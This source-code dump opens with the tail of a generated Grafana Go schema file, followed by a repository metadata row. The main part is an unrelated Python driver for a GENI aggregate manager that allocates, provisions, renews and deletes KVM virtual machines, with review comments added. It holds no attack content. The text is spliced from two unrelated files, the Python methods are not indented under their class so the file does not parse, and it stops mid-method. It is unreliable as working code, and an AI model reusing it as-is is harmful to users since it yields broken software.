	kindDummy = resource.Kind{
		Schema: schemaDummy,
		Codecs: map[resource.KindEncoding]resource.Codec{
			resource.KindEncodingJSON: &DummyJSONCodec{},
		},
	}
)
// DummyKind returns a resource.Kind for this Schema with a JSON codec
func DummyKind() resource.Kind {
	return kindDummy
}
// DummySchema returns a resource.SimpleSchema representation of Dummy
func DummySchema() *resource.SimpleSchema {
	return schemaDummy
}
// Interface compliance checks
var _ resource.Schema = kindDummy | go | github | https://github.com/grafana/grafana | apps/alerting/historian/pkg/apis/alertinghistorian/v0alpha1/dummy_schema_gen.go |
# -*- coding: utf-8 -*-
# Copyright 2014-2015 National Institute of Advanced Industrial Science and Technology
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from am.geniutils.src.xrn.xrn import hrn_to_urn, urn_to_hrn
from am.rspecs.src.geni.v3.container.resource import Resource
from am.rspecs.src.geni.v3.container.sliver import Sliver
from am.rspecs.src.geni.v3.container.link import Link
from vt_manager_kvm.controller.drivers.VTDriver import VTDriver
from vt_manager_kvm.controller.dispatchers.xmlrpc.ProvisioningDispatcher import ProvisioningDispatcher
from vt_manager_kvm.models.VirtualMachineKeys import VirtualMachineKeys
from vt_manager_kvm.utils.contextualization.vm_contextualize import VMContextualize
from vt_manager_kvm.utils.UrlUtils import UrlUtils
from vt_manager_kvm.models.VirtualMachine import VirtualMachine
from vt_manager_kvm.models.VTServer import VTServer
from vt_manager_kvm.models.Action import Action
from vt_manager_kvm.models.Reservation import Reservation
from vt_manager_kvm.models.expiring_components import ExpiringComponents
from vt_manager_kvm.utils.SyncThread import SyncThread
from vt_manager_kvm.utils.ServiceProcess import ServiceProcess
from vt_manager_kvm.utils.ServiceThread import ServiceThread
from vt_manager_kvm.communication.utils.XmlHelper import XmlHelper
from vt_manager_kvm.communication.utils.XmlHelper import XmlCrafter
from vt_manager_kvm.models.VirtualMachineKeys import VirtualMachineKeys
#from geniutils.src.xrn.xrn import hrn_to_urn
#from geniutils.src.xrn.xrn import urn_to_hrn
import multiprocessing
import threading
import copy
import uuid
import logging
import random
from datetime import datetime
from datetime import timedelta
import dateutil.parser
import traceback
class VTAMDriver:
logger = logging.getLogger("vtam")
def __init__(self):
    # Best-effort mode: per-sliver failures are reported on the returned
    # resources instead of aborting the whole operation
    self.__geni_best_effort_mode = True
    self.__agent_callback_url = "SFA.OCF.VTM"
    # Serialise provisioning actions across threads and processes
    self.__mutex_thread = threading.Lock()
    self.__mutex_process = multiprocessing.Lock()
    # GENI AM API allocation/operational state tags used throughout the driver
    self.GENI_ALLOCATED = "geni_allocated"
    self.GENI_UNALLOCATED = "geni_unallocated"
    self.GENI_PROVISIONED = "geni_provisioned"
    self.GENI_READY = "geni_ready"
    self.GENI_NOT_READY = "geni_notready"
    self.GENI_CONFIGURING = "geni_configuring"
    self.GENI_FAILED = "geni_failed"
    self.GENI_PENDING_TO_ALLOCATE = "geni_pending_allocation"
    self.GENI_UPDATING_USERS = "geni_updating_users"
    # Set externally; expected to provide CM_HRN / FOREIGN_HRN — TODO confirm setter
    self.__config = None
def get_version(self):
    """GENI GetVersion placeholder; not implemented here (always None)."""
    return None
def get_specific_server_and_vms1(self, urn, geni_available=False):
    """
    When 'available' is False or unspecified, all resources must be retrieved.
    """
    # NOTE(review): looks like a superseded draft of get_specific_server_and_vms;
    # it contains dead code and can report provisioned VMs twice (see notes below).
    VTAMDriver.logger.debug("XXX urn = " + urn)
    params = self.__urn_to_vm_params(urn)
    servers = VTServer.objects.all()
    resources = list()
    vms = list()
    for server in servers:
        if not server.available and geni_available:
            continue
        VTAMDriver.logger.debug("virttech = " + server.getVirtTech())
        # Look for provisioned VMs
        vms_provisioned = list()
        child = server.getChildObject()
        if child:
            VTAMDriver.logger.debug("child = " + child.__class__.__name__)
            vms_provisioned.extend(child.getVMs(**params))
        else:
            continue
        # NOTE(review): getVMs() is queried a second time, discarding the list built above
        vms_provisioned = child.getVMs(**params)
        # NOTE(review): vm_names is computed but never used in this variant
        vm_names = self.__return_vm_names(vms_provisioned)
        vms_allocated = Reservation.objects.filter(server__id=server.id, **params)
        if len(vms_allocated) == 0:
            continue
        for vm1 in vms_allocated:
            # NOTE(review): dead loop — body does nothing
            pass
        vms.extend(vms_provisioned)
        # ... Also for reserved VMs
        # NOTE(review): provisioned VMs are extended twice, duplicating entries
        vms.extend(vms_provisioned)
        # NOTE: if there are VMs provisioned, these are the ones to be returned
        # Explanation: when a VM is provisioned, the reservation for the
        # VM may still be active, but it is of no interest to the user
        #if not vms_provisioned:
        vms.extend(vms_allocated)
        if vms:
            converted_resources = self.__convert_to_resources_with_slivers(server, vms)
            resources.extend(converted_resources)
    return resources
def get_specific_server_and_vms(self, urn, geni_available=False):
    """
    When 'available' is False or unspecified, all resources must be retrieved.
    """
    VTAMDriver.logger.debug("XXX urn = " + urn)
    params = self.__urn_to_vm_params(urn)
    servers = VTServer.objects.all()
    resources = list()
    for server in servers:
        vms = list()
        # Skip unavailable servers only when the caller asked for available ones
        if not server.available and geni_available:
            continue
        VTAMDriver.logger.debug("virttech = " + server.getVirtTech())
        # Look for provisioned VMs
        vms_provisioned = list()
        child = server.getChildObject()
        if child:
            VTAMDriver.logger.debug("child = " + child.__class__.__name__)
            vms_provisioned.extend(child.getVMs(**params))
        # ... Also for reserved VMs
        vm_names = self.__return_vm_names(vms_provisioned)
        # NOTE: if there are VMs provisioned, these are the ones to be returned
        # Explanation: when a VM is provisioned, the reservation for the
        # VM may still be active, but it is of no interest to the user
        #if not vms_provisioned:
        # Reservations whose VM is already provisioned are excluded by name
        vms_allocated = Reservation.objects.filter(server__id=server.id, **params).exclude(name__in = vm_names)
        vms.extend(vms_provisioned)
        vms.extend(vms_allocated)
        if vms:
            converted_resources = self.__convert_to_resources_with_slivers(server, vms)
            resources.extend(converted_resources)
    return resources
def __return_vm_names(self, vms):
    """Collect the name attribute of every VM in @vms."""
    return [vm.name for vm in vms]
def get_all_servers(self, geni_available=False):
    """
    When 'available' is False or unspecified, all resources must be retrieved.
    """
    resources = []
    for server in VTServer.objects.all():
        # Skip unavailable servers only when the caller asked for available ones
        if geni_available and not server.available:
            continue
        resources.append(self.__convert_to_resource(server))
        resources.extend(self.__convert_to_links(server))
    return resources
def __validate_precondition_states(self, vm, method_name=""):
    """Raise when @vm is in a transient state (operational state contains '...')."""
    action_label = str(method_name + " action")
    # Methods that alter VirtualMachine should not operate on VMs in a transient state
    current_state = self.__translate_to_operational_state(vm)
    if "..." in current_state:
        raise Exception("REFUSED to perform %s on sliver in a transient state" % action_label)
def create_vms(self, urn, expiration=None, users=None, geni_best_effort=True):
    """Provision every allocated-but-not-yet-provisioned VM matching @urn.

    Returns the list of manifested sliver resources. Raises when no
    allocation exists; in best-effort mode, per-VM provisioning failures
    are attached to the returned resources instead of aborting.
    """
    # TODO: Manage Exceptions,
    # Avoid the shared mutable default argument of the original signature
    if users is None:
        users = list()
    vm_params = self.__urn_to_vm_params(urn)
    reservations = Reservation.objects.filter(**vm_params)
    # Provisioning a VM must be made after an Allocate. Allocate:Provisioning follow 1:1 ratio
    if not reservations:
        # Be cautious when changing the messages, as handler depends on those
        raise Exception("No allocation found")
    # Retrieve only the reservations that are not provisioned yet
    reservations = Reservation.objects.filter(**vm_params).filter(is_provisioned=False)
    if not reservations:
        # Be cautious when changing the messages, as handler depends on those
        raise Exception("Re-provisioning not possible. Try allocating first")
    slivers_to_manifest = list()
    for r in reservations:
        # Keep 'vms' bound so the best-effort error path below cannot raise a
        # NameError when the failure happens before the VM query (original bug)
        vms = list()
        try:
            provisioning_rspec = self.get_action_instance(r)
            with self.__mutex_thread:
                SyncThread.startMethodAndJoin(ProvisioningDispatcher.processProvisioning, provisioning_rspec, self.__agent_callback_url)
            # Update vm_params to get the exact, corresponding VM for each reservation
            vm_params.update({"name": r.name})
            vms = VirtualMachine.objects.filter(**vm_params)
            VTAMDriver.logger.debug("XXX vms.len = " + str(len(vms)))
            self.__store_user_keys(users, vms)
            # When reservation (allocation) is fulfilled, mark appropriately
            r.set_provisioned(True)
            r.save()
        except Exception as e:
            if geni_best_effort:
                # __convert_to_resources_with_slivers returns a list; annotate
                # each entry (the original called set_error_message on the list)
                manifested_resources = self.__convert_to_resources_with_slivers(r.server, vms, expiration)
                for manifested_resource in manifested_resources:
                    manifested_resource.set_error_message(str(e))
                slivers_to_manifest.extend(manifested_resources)
                continue
            else:
                raise e
        manifested_resources = self.__convert_to_resources_with_slivers(r.server, vms, expiration)
        slivers_to_manifest.extend(manifested_resources)
    self.__add_expiration(expiration, reservations[0].projectName, reservations[0].sliceName)
    return slivers_to_manifest
def reserve_vms(self, slice_urn, reservation, expiration=None, users=list()):
    """Allocate (reserve, without provisioning) a VM for @slice_urn.

    Returns @reservation updated with sliver information, or None when the
    reservation targets a different aggregate's component manager.
    """
    # URNs of foreign RMs are not served
    current_cm_hrn = self.__config.CM_HRN
    cm_id = getattr(reservation, "get_component_manager_id")
    if callable(cm_id):
        cm_id = urn_to_hrn(cm_id())[0]
    if current_cm_hrn != cm_id:
        # No reservation is provided for URNs of other CMs
        return None
    # VMs are dynamic resource -> no collision will happen
    slice_hrn, hrn_type = urn_to_hrn(slice_urn)
    if not reservation.get_component_id() == None:
        # Caller pinned a specific server via the component id
        server_hrn, hrn_type = urn_to_hrn(reservation.get_component_id())
        server_name = server_hrn.split(".")[-1]
        VTAMDriver.logger.debug("server_name = " + server_name + ", server_hrn = " + server_hrn)
    else:
        # No explicit server requested: place on the least loaded one
        server_name = self.__get_best_server()
        server_hrn = self.__config.CM_HRN + "." + server_name
        VTAMDriver.logger.debug("server_name = " + server_name + ", server_hrn = " + server_hrn)
    server = VTServer.objects.get(name=server_name).getChildObject()
    server_id = server.id
    if reservation.get_id():
        # Reject duplicate client ids within the slice (allocated or provisioned)
        if Reservation.objects.filter(sliceName=slice_hrn, projectName=slice_hrn, name=reservation.get_id()) or VirtualMachine.objects.filter(sliceName=slice_hrn, projectName=slice_hrn, name=reservation.get_id()):
            raise Exception("There is another VM with client id %s on this slice already <GENI PROVISIONED> or <GENI ALLOCATED>" %reservation.get_id())
        reservation_name = reservation.get_id()
    else:
        reservation_name = str(random.randint(0,1000*1000))
    if expiration == None:
        # Default allocation lifetime: one week
        expiration = datetime.utcnow() + timedelta(hours=168)
    reserved_vm = Reservation()
    #reserved_vm.reservation_id = random.randint(0,1000)
    reserved_vm.server_id = server_id
    reserved_vm.set_slice_name(slice_hrn)
    reserved_vm.set_project_name(slice_hrn)
    reserved_vm.set_name(reservation_name)
    reserved_vm.set_valid_until(str(expiration))
    reserved_vm.uuid = str(uuid.uuid4())
    reserved_vm.set_disk_image(reservation.get_disk_image())
    reserved_vm.save()
    if not reservation.get_sliver():
        reservation.set_sliver(Sliver())
    # Set information for sliver
    sliver_urn = hrn_to_urn(server_hrn+"." + slice_hrn.split(".")[-1] + "." +str(reservation_name), "sliver")
    VTAMDriver.logger.debug("XXX sliver_urn = " + sliver_urn)
    reservation.get_sliver().set_urn(sliver_urn)
    reservation.get_sliver().set_allocation_status(self.GENI_ALLOCATED)
    reservation.get_sliver().set_expiration(expiration)
    reservation.get_sliver().set_operational_status(self.GENI_NOT_READY)
    reservation.get_sliver().set_client_id(reservation_name)
    # NOTE(review): this assignment clobbers the set_allocation_status method
    # with a string instead of calling it — probably meant to be
    # reservation.set_allocation_status(self.GENI_ALLOCATED); confirm intent
    reservation.set_allocation_status = self.GENI_ALLOCATED
    #vm_params = self.__urn_to_vm_params(slice_urn)
    #self.__store_user_keys(users, vm_params)
    return reservation
def renew_vms(self, urn, expiration):
    """Extend the expiration of every provisioned and allocated VM matching @urn.

    Returns the refreshed resource list for @urn.
    """
    vm_params = self.__urn_to_vm_params(urn)
    resources = list()
    try:
        provisioned_vms = VirtualMachine.objects.filter(**vm_params)
        if provisioned_vms:
            for provisioned_vm in provisioned_vms:
                self.__add_expiration(expiration, provisioned_vm.projectName, provisioned_vm.sliceName)
    except Exception as e:
        # Fixed: the original tested self.__geni_best_effort, an attribute that
        # is never set (the flag is __geni_best_effort_mode), so this branch
        # always raised AttributeError; it also used 'continue' outside a loop.
        if self.get_geni_best_effort_mode():
            resources.extend(self.get_specific_server_and_vms(urn))
            for resource in resources:
                resource.set_error_message(str(e))
        else:
            raise e
    # An existing Reservation and a non existing VirtualMachine implies there is only an allocated VM
    # Pre-initialise so the except branch below cannot hit a NameError when the
    # filter itself fails
    reserved_vms = list()
    try:
        reserved_vms = Reservation.objects.filter(**vm_params)
        for reserved_vm in reserved_vms:
            reserved_vm.set_valid_until(expiration)
            reserved_vm.save()
            self.__add_expiration(expiration, reserved_vm.projectName, reserved_vm.sliceName)
            resources.extend(self.__convert_to_resources_with_slivers(reserved_vm.server, [reserved_vm], expiration))
    except Exception as e:
        # Best effort: still record the expiration for whatever was fetched
        if reserved_vms:
            for reserved_vm in reserved_vms:
                self.__add_expiration(expiration, reserved_vm.projectName, reserved_vm.sliceName)
                resources.extend(self.__convert_to_resources_with_slivers(reserved_vm.server, [reserved_vm], expiration))
        raise e
    return self.get_specific_server_and_vms(urn)
def start_vm(self, urn):
    """Start the VMs matching @urn via the provisioning dispatcher."""
    return self.__crud_vm(urn, Action.PROVISIONING_VM_START_TYPE)
def stop_vm(self, urn):
    """Stop the VMs matching @urn via the provisioning dispatcher."""
    return self.__crud_vm(urn, Action.PROVISIONING_VM_STOP_TYPE)
def reboot_vm(self, urn):
    """Reboot the VMs matching @urn.

    Attempts a stop+start cycle first; on any failure falls back to the
    native reboot action.
    """
    try:
        self.stop_vm(urn)
        return self.start_vm(urn)
    except Exception as e:
        # Note: Some problems with MINIMUM_RESTART_TIME
        return self.__crud_vm(urn, Action.PROVISIONING_VM_REBOOT_TYPE)
def delete_vm(self, urn):
    """Delete every provisioned VM and allocation matching @urn.

    Returns the deleted resources marked unallocated; raises when nothing
    matched the URN.
    """
    vm_params = self.__urn_to_vm_params(urn)
    vms_allocated = Reservation.objects.filter(**vm_params)
    vms_provisioned = VirtualMachine.objects.filter(**vm_params)
    if not vms_allocated and not vms_provisioned:
        raise Exception("Slice Does not Exists")
    # Remove SSH keys for each provisioned VM
    for vm_provisioned in vms_provisioned:
        params_list = self.__vm_to_ssh_keys_params_list(vm_provisioned)
        for params in params_list:
            VirtualMachineKeys.objects.filter(**params).delete()
    # Provisioned VMs are deleted here
    resources = self.__crud_vm(urn, Action.PROVISIONING_VM_DELETE_TYPE)
    if vms_provisioned or vms_allocated:
        # NOTE(review): vm_params has no "sliceName" key for id-based sliver
        # URNs (see __urn_to_vm_params) — this lookup would KeyError; confirm
        expirations = ExpiringComponents.objects.filter(slice = vm_params["sliceName"])
        if expirations:
            expiration = expirations[0].expires
        else:
            expiration = None
        # Report every returned sliver as unallocated / pending allocation
        for resource in resources:
            resource.set_allocation_state(self.GENI_UNALLOCATED)
            resource.set_operational_state(self.GENI_PENDING_TO_ALLOCATE)
            resource.get_sliver().set_allocation_status(self.GENI_UNALLOCATED)
            resource.get_sliver().set_operational_status(self.GENI_PENDING_TO_ALLOCATE)
            resource.get_sliver().set_expiration(expiration)
    # Allocated VMs are deleted here
    vms_allocated.delete()
    if not resources:
        raise Exception("Slice Does Not Exist")
    return resources
def get_geni_best_effort_mode(self):
    """Return whether per-sliver failures are tolerated (GENI best-effort mode)."""
    return self.__geni_best_effort_mode
def set_geni_best_effort_mode(self, value):
    """Toggle GENI best-effort mode (truthy value = tolerate per-sliver failures)."""
    self.__geni_best_effort_mode = value
def __crud_vm(self, urn, action):
    """Apply @action (start/stop/reboot/delete) to every VM matching @urn.

    Provisioned VMs get the action propagated to the provisioning
    dispatcher; allocated-only VMs are merely reported. Returns the
    resulting resource list.
    """
    params = self.__urn_to_vm_params(urn)
    servers = VTServer.objects.all()
    vm_server_pairs = list()
    resources = list()
    for server in servers:
        vms = list()
        VTAMDriver.logger.debug("XXX server = " + str(server.__class__))
        # Look for provisioned VMs
        vms_provisioned = server.getChildObject().getVMs(**params)
        # ... Also for reserved VMs
        vms_allocated = Reservation.objects.filter(server__id=server.id, **params)
        vms.extend(vms_provisioned)
        vms.extend(vms_allocated)
        for vm in vms:
            VTAMDriver.logger.debug("XXX vm = " + str(vm.__class__))
            # The following is to be executed only for provisioned VMs
            if isinstance(vm, VirtualMachine):
                # Return "REFUSED" exception if sliver is in a transient state
                self.__validate_precondition_states(vm, action)
                # Return "BUSY" exception if sliver is in incorrect operational state
                if self.__translate_to_operational_state(vm) == self.GENI_UPDATING_USERS:
                    VTAMDriver.logger.warn("BUSY sliver in state '%s'" % self.GENI_UPDATING_USERS)
                    raise Exception("BUSY sliver in state '%s'" % self.GENI_UPDATING_USERS)
                # Track each (server, vm) pair once; presumably for bookkeeping
                vm_params = {"server_uuid":server.uuid, "vm_id":vm.id}
                if vm_params not in vm_server_pairs:
                    vm_server_pairs.append(vm_params)
                try:
                    # Serialise dispatcher calls across threads
                    with self.__mutex_thread:
                        VTDriver.PropagateActionToProvisioningDispatcher(vm.id, server.uuid, action)
                except Exception as e:
                    VTAMDriver.logger.exception("")
                    try:
                        if self.get_geni_best_effort_mode():
                            # Best effort: attach the error to this VM's resource
                            # and keep processing the remaining VMs
                            resource = self.__convert_to_resources_with_slivers(server, [vm])[0]
                            resource.set_error_message(str(e))
                            #resources.extend(resource)
                            resources.append(resource)
                            continue
                        else:
                            raise e
                    except Exception as e:
                        VTAMDriver.logger.exception("")
                        raise e
            # The resources are fetched for any (allocated/provisioned) VM
            resource = self.__convert_to_resources_with_slivers(server, [vm])
            resources.extend(resource)
    return resources
def __get_best_server(self):
    """Return the name of the server currently hosting the fewest VMs.

    NOTE(review): servers with equal VM counts overwrite one another in the
    mapping, so ties resolve to the last server iterated — preserved as-is.
    """
    vms_per_count = dict(
        (len(server.getChildObject().getVMs()), server.name)
        for server in VTServer.objects.all()
    )
    return vms_per_count[min(vms_per_count)]
def __urn_to_vm_params(self, urn):
    """Translate a GENI URN into Django filter kwargs for VM lookups.

    Sliver URNs whose last hrn component is numeric are matched by id;
    otherwise by VM name plus case-insensitive (regex) slice name. Slice
    URNs match on slice/project name. Returns None for other URN types.
    """
    # XXX For now, I prefer to have the same slice name as project name
    hrn, hrn_type = urn_to_hrn(urn)
    if hrn_type == "sliver":
        value = hrn.split(".")[-1]
        try:
            # Numeric sliver identifiers map directly to the VM primary key
            return {"id": int(value)}
        except ValueError:
            # Narrowed from a bare except: int() on a str only raises
            # ValueError. Non-numeric identifiers (e.g. VMs created from
            # jFed) are matched by name plus partial slice name.
            slice_name = hrn.split(".")[-2]
            return {"name": value, "sliceName__iregex": slice_name}
    elif hrn_type == "slice":
        return {"projectName": hrn, "sliceName": hrn}
    else:
        return None
def __convert_to_resource(self, server):
    """Build a Resource advertisement for @server (no slivers attached)."""
    # TODO add missing params
    resource = Resource()
    resource.set_component_manager_id(self.__generate_component_manager_id(server))
    resource.set_component_manager_name(self.__generate_component_manager_id(server))
    resource.set_component_id(self.__generate_component_id(server))
    resource.set_component_name(self.__generate_component_id(server))
    # Default params
    resource.set_available(server.available)
    resource.set_exclusive(False)
    return resource
def __convert_to_links(self, server):
    """Build a Link advertisement for each server interface attached to a switch.

    Interfaces without a switchID are skipped.
    """
    links = list()
    network_ifaces = server.networkInterfaces.all()
    for network_interface in network_ifaces:
        link = Link()
        if not network_interface.switchID:
            continue
        #network_interface.switchID = "OfeliaVPNGateWay"
        # Destination endpoint encoded as "<dpid>_<port>"
        dpid_port = "%s_%s" % (network_interface.switchID, network_interface.port)
        component_id = self.__get_link_urn(network_interface.name, dpid_port, server.name)
        VTAMDriver.logger.debug("XXX name = " + network_interface.name + ", dpid_port = " + dpid_port)
        #VTAMDriver.logger.debug("XXX component_id = " + component_id)
        link.set_component_id(component_id)
        link.set_component_name(component_id)
        # Hard-coded advertised capacity — TODO confirm where the real value lives
        link.set_capacity("1024MB/s")
        link.set_dest_id(self.__get_foreign_urn(network_interface.switchID))
        link.set_source_id(self.__get_port_urn(network_interface.name, server.name))
        #VTAMDriver.logger.debug("XXX source_id = " + link.get_source_id())
        link.set_type("L2 Link")
        links.append(link)
    return links
def __get_link_urn(self, source, dst, server_name):
    """Build the link URN joining interface *source* and endpoint *dst* on *server_name*."""
    iface = self.__correct_iface_name(source)
    link_hrn = "%s.%s.%s-%s" % (self.__config.CM_HRN, server_name, iface, dst)
    return hrn_to_urn(link_hrn, "link")
def __correct_iface_name(self, iface_name):
    """Return the interface base name: everything before the first dot.

    "eth0.100" -> "eth0"; names without a dot come back unchanged.
    """
    # Equivalent to the old recursion: split once and keep the head
    return iface_name.split(".")[0]
def __get_foreign_urn(self, dpid):
    """Build the datapath URN for a switch that lives outside this aggregate."""
    foreign_hrn = "%s.%s" % (self.__config.FOREIGN_HRN, dpid)
    return hrn_to_urn(foreign_hrn, "datapath")
def __get_port_urn(self, port, server_name):
    """Build the interface URN for *port*: the server's node URN plus '+interface+<name>'."""
    iface = self.__correct_iface_name(port)
    node_urn = hrn_to_urn("%s.%s" % (self.__config.CM_HRN, server_name), "node")
    return "%s+interface+%s" % (node_urn, iface)
def __convert_to_resources_with_slivers(self, server, vms, expiration=None):
    """
    Always return a list of slivers, independently of the number of resources inside.

    Builds one Resource (deep copy of the server's base advertisement) per
    VM and attaches a Sliver carrying URN, statuses and expiration.

    Fixes: the Python 2 ``print e`` is replaced with logging (consistent
    with the rest of this class) and a duplicated ``set_expiration`` call
    was removed.
    """
    resource = self.__convert_to_resource(server)
    resources = list()
    for vm in vms:
        # Expiration fallback chain: ExpiringComponents -> vm.valid_until -> now
        if not expiration:
            try:
                expiration = ExpiringComponents.objects.filter(slice=vm.sliceName, authority=vm.projectName)[0].expires
            except Exception as e:
                VTAMDriver.logger.debug("ExpiringComponents lookup failed: %s" % str(e))
        if not expiration:
            VTAMDriver.logger.debug("cannot find expiration in ExpiringComponents, use vm.valid_until")
            expiration = vm.valid_until
        if not expiration:
            VTAMDriver.logger.debug("cannot find expiration in vm class, use default")
            expiration = datetime.today()
        VTAMDriver.logger.debug("expiration = " + str(expiration))
        new_resource = copy.deepcopy(resource)
        new_resource.set_id(vm.name)
        VTAMDriver.logger.debug("vm.name = " + new_resource.get_id())
        sliver = Sliver()
        sliver.set_type("VM")
        sliver.set_expiration(expiration)
        sliver.set_client_id(vm.name)
        sliver.set_urn(self.__generate_sliver_urn(vm, server.name + "." + vm.sliceName.split(".")[-1]))
        sliver.set_slice_urn(hrn_to_urn(vm.sliceName, "slice"))
        if isinstance(vm, VirtualMachine):
            # Login services only make sense for provisioned VMs
            sliver.set_services(self.__generate_vt_am_services(vm))
        sliver.set_allocation_status(self.__translate_to_allocation_state(vm))
        sliver.set_operational_status(self.__translate_to_operational_state(vm))
        new_resource.set_sliver(sliver)
        resources.append(copy.deepcopy(new_resource))
    return resources
# Sliver Utils Stuff
def __generate_vt_am_services(self, vm):
    """Build the GENI "login" service entries advertised for *vm*.

    One entry is emitted per distinct key-owning user name, although the
    advertised credential is currently always root over SSH port 22.
    """
    vm_ip = self.__get_ip_from_vm(vm)
    #login_services = [{"login":{"authentication":"ssh", "hostname":vm_ip, "port": "22", "username":"root:openflow"}}]
    keys = VirtualMachineKeys.objects.filter(vm_uuid=vm.uuid)
    login_services = []
    used_user_names = []
    for key in keys:
        # De-duplicate: only one login entry per user name
        if not key.user_name in used_user_names:
            #login_services.append({"login":{"authentication":"ssh-keys", "hostname":vm_ip, "port": "22", "username":key.user_name}})
            login_services.append({"login":{"authentication":"ssh", "hostname":vm_ip, "port": "22", "username":"root"}})
            used_user_names.append(key.user_name)
    return login_services
# URN Stuff
def __generate_component_manager_id(self, server):
    """Build the authority+cm URN identifying this aggregate manager."""
    cm_hrn = self.__config.CM_HRN
    return hrn_to_urn(cm_hrn, "authority+cm")
def __generate_component_manager_name(self, server):
    """Build the authority+cm URN used as this aggregate manager's name."""
    return hrn_to_urn(self.__config.CM_HRN, "authority+cm")
def __generate_component_id(self, server):
    """Build the node URN identifying *server*."""
    node_hrn = "%s.%s" % (self.__config.CM_HRN, server.name)
    return hrn_to_urn(node_hrn, "node")
def generate_component_id(self, server):
    """Public alias for the private component-id generator.

    Delegates instead of duplicating the URN-building expression so the
    two methods cannot drift apart.
    """
    return self.__generate_component_id(server)
def __generate_component_name(self, server):
    """Build the node URN used as the component name of *server*."""
    return hrn_to_urn("%s.%s" % (self.__config.CM_HRN, server.name), "node")
def __generate_sliver_urn(self, vm, slice_leaf=None):
    """Build the sliver URN for *vm*, optionally scoped under *slice_leaf*."""
    parts = [self.__config.CM_HRN]
    if slice_leaf:
        parts.append(slice_leaf)
    parts.append(str(vm.name))
    return hrn_to_urn(".".join(parts), "sliver")
def generate_sliver_urn(self, vm, slice_leaf=None):
    """Public alias for the private sliver-URN generator.

    Delegates instead of duplicating the URN-building logic so the two
    methods cannot drift apart.
    """
    return self.__generate_sliver_urn(vm, slice_leaf)
def __select_sliver_expiration(self, user_expiration, slice_expiration=None, **kwargs):
    """Return the earlier of the user-requested and slice expiration times.

    When no slice expiration is given, one is synthesised as
    now + kwargs["extension_timedelta"] (default: 31 days) and formatted
    as an ISO-8601 UTC string ("YYYY-MM-DDTHH:MM:SSZ").

    NOTE(review): min() compares the two values directly; when both are
    strings this is lexicographic -- confirm both sides always share the
    same format.
    """
    if not slice_expiration:
        current_time = datetime.utcnow()
        if "extension_timedelta" in kwargs:
            extension_timedelta = kwargs["extension_timedelta"]
        else:
            extension_timedelta = {"days": 31} # Default set to one month
        slice_expiration = current_time + timedelta(**extension_timedelta)
        slice_expiration = slice_expiration.replace(tzinfo=dateutil.tz.tzutc()).strftime("%Y-%m-%d %H:%M:%S")
        slice_expiration = slice_expiration.replace(" ", "T")+"Z"
    # Retrieve expiration = minimum ( user expiration, slice expiration )
    extended_expiration = min(user_expiration, slice_expiration)
    return extended_expiration
# VT AM Models Utils
def __get_ip_from_vm(self, vm):
    """Return the IPv4 address of the VM's management interface.

    Falls back to the literal string "None" when no management interface
    is present (kept for backwards compatibility with callers).
    """
    for iface in vm.getNetworkInterfaces():
        if not iface.isMgmt:
            continue
        return iface.ip4s.all()[0].ip
    return "None"
def get_action_instance(self, reservation):
    """Build the XML provisioning query (a "create" action) for *reservation*."""
    rspec = XmlHelper.getSimpleActionQuery()
    actionClass = copy.deepcopy(rspec.query.provisioning.action[0])
    actionClass.type_ = "create"
    # Remove the template action; a filled-in copy is appended below
    rspec.query.provisioning.action.pop()
    #server = reservation.server()
    server = reservation.server
    vm = self.get_default_vm_parameters(reservation)
    actionClass.id = uuid.uuid4()
    self.vm_dict_to_class(vm, actionClass.server.virtual_machines[0])
    self.vm_dict_ifaces_to_class(vm["interfaces"],actionClass.server.virtual_machines[0].xen_configuration.interfaces)
    actionClass.server.uuid = server.uuid
    actionClass.server.virtualization_type = server.getVirtTech()
    rspec.query.provisioning.action.append(actionClass)
    return rspec.query.provisioning
def get_default_vm_parameters_old(self, reservation):
    """Legacy defaults for a new VM: fixed legacy disk image and 512 MB RAM."""
    VTAMDriver.logger.debug("get_default_vm_parameters() called")
    ### TODO: Consider used the same name as id for project and slices
    vm = {
        "project-id": str(uuid.uuid4()),
        "slice-id": str(uuid.uuid4()),
        "project-name": reservation.get_project_name(),
        "slice-name": reservation.get_slice_name(),
        "uuid": reservation.uuid,
        "virtualization-type": reservation.server.getVirtTech(),
        "server-id": reservation.server.getUUID(),
        "name": reservation.get_name(),
        "state": "on queue",
        "aggregate-id": "aggregate-id",
        "operating-system-type": "GNU/Linux",
        "operating-system-version": "6.0",
        "operating-system-distribution": "Debian",
        "hd-origin-path": "legacy/legacy.tar.gz",
        "interfaces": [],
        "hd-setup-type": "file-image",
        "virtualization-setup-type": "paravirtualization",
        "memory-mb": 512,
    }
    return vm
# AIST 201508
def get_default_vm_parameters(self, reservation):
    """Default parameters for a new VM: disk image from the reservation, 4096 MB RAM."""
    VTAMDriver.logger.debug("get_default_vm_parameters() called")
    ### TODO: Consider used the same name as id for project and slices
    vm = {
        "project-id": str(uuid.uuid4()),
        "slice-id": str(uuid.uuid4()),
        "project-name": reservation.get_project_name(),
        "slice-name": reservation.get_slice_name(),
        "uuid": reservation.uuid,
        "virtualization-type": reservation.server.getVirtTech(),
        "server-id": reservation.server.getUUID(),
        "name": reservation.get_name(),
        "state": "on queue",
        "aggregate-id": "aggregate-id",
        "operating-system-type": "GNU/Linux",
        "operating-system-version": "6.0",
        "operating-system-distribution": "Debian",
        "hd-origin-path": reservation.get_disk_image(),
        "interfaces": [],
        "hd-setup-type": "file-image",
        "virtualization-setup-type": "paravirtualization",
        "memory-mb": 4096,
    }
    return vm
def vm_dict_to_class(self, vm_dict, vm_class):
    """Copy VM parameters from a plain dict onto an XML action class instance."""
    # (dict key, attribute name) pairs for the flat VM fields
    field_map = [
        ("name", "name"),
        ("uuid", "uuid"),
        ("state", "status"),
        ("project-id", "project_id"),
        ("project-name", "project_name"),
        ("slice-id", "slice_id"),
        ("slice-name", "slice_name"),
        ("operating-system-type", "operating_system_type"),
        ("operating-system-version", "operating_system_version"),
        ("operating-system-distribution", "operating_system_distribution"),
        ("virtualization-type", "virtualization_type"),
        ("server-id", "server_id"),
    ]
    for dict_key, attr in field_map:
        setattr(vm_class, attr, vm_dict[dict_key])
    # Xen-specific settings live on a nested configuration object
    xen = vm_class.xen_configuration
    xen.hd_setup_type = vm_dict["hd-setup-type"]
